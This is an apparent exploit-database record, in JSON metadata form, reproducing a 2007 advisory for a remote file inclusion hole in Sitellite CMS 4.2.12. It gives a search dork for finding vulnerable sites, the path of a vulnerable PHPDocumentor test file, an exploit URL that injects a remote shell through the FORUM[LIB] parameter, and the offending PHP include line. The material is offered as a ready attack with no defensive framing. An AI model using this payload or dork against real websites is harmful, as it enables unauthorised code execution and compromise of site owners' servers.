Description
Exploit for unknown platform in category web applications
{"id": "1337DAY-ID-1949", "type": "zdt", "bulletinFamily": "exploit", "title": "Sitellite CMS <= 4.2.12 (559668.php) Remote File Inclusion Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2007-06-14T00:00:00", "modified": "2007-06-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/1949", "reporter": "o0xxdark0o", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-10T03:26:55", "viewCount": 9, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/1949", "sourceData": "========================================================================\r\nSitellite CMS <= 4.2.12 (559668.php) Remote File Inclusion Vulnerability\r\n========================================================================\r\n\r\n\r\n\r\n\r\n*sitellite*<http://www.sitelliteforge.com/index/siteforge-download-action/proj.sitellite?dl=sitellite-4.2.12-stable.tar.gz>\r\nv 4.2.12\r\nDORK : \"powered by Sitellite\"\r\nFOUND BY : o0xxdark0o\r\nDOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite\r\nREMOTE FILE ICLUDE\r\n############################################################\r\nFILE :\r\nPATH\\saf\\lib\\PEAR\\PhpDocumentor\\Documentation\\tests\\bug-559668.php\r\n############################################################\r\nEXP:\r\nxxx.com\\path\\saf\\lib\\PEAR\\PhpDocumentor\\Documentation\\tests\\559668.php?FORUM[LIB]=Shell\r\n?\r\n############################################################\r\nCODE: on line 4\r\n<?php\r\n/** @package tests */\r\n/** include tests */\r\nrequire_once $FORUM['LIB'] . '/classes/db/PearDb.php';\r\nrequire PEAR . 'test' . 'me';\r\ninclude('file.ext');\r\ninclude 'file.ext';\r\ninclude(PEAR . 'test' . 'me');\r\n?>\r\n############################################################\r\nthanks for all my friends. mr_6.1.9 .... oxdo .... cold z3ro\r\n############################################################\r\nBY : o0xxdark0o\r\n\r\n\r\nPhpDocumentor directory is .htaccess'ed\r\n\r\n\r\n\n# 0day.today [2018-01-10] #", "_state": {"dependencies": 1647594257, "score": 1659766679}}
{}
Sitellite CMS <= 4.2.12 (559668.php) Remote File Inclusion Vulnerability